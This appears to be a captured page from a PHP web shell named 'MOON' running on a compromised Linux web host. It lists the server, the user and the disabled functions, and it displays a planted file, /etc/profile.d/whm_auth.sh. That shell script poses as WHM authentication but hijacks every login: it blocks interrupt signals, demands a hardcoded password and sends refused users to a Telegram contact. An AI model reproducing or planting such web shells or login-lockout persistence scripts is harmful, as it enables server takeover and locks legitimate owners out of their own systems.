MOON
Server: Apache
System: Linux u18017238.onlinehome-server.com 3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 x86_64
User: emblazeone (1003)
PHP: 7.3.33
Disabled: exec,passthru,shell_exec,system
Upload Files
File: //etc/profile.d/whm_auth.sh
#!/bin/bash
trap "" SIGINT SIGTSTP
echo -e "\033[1;36mNowMeee\033[0m"
echo -e "\033[1;36m- eclipse securitylabs\033[0m"
read -sp "PASSWORD = " pass
echo
if [ "$pass" != "Nomi8899##\$\$" ]; then
  echo -e "\n\033[1;31mAkses ditolak! Hubungi: https://t.me/+jV4DtS3LMsE2NTVl\033[0m"
  sleep 2
  exit 1
fi
exec /bin/bash --noprofile --norc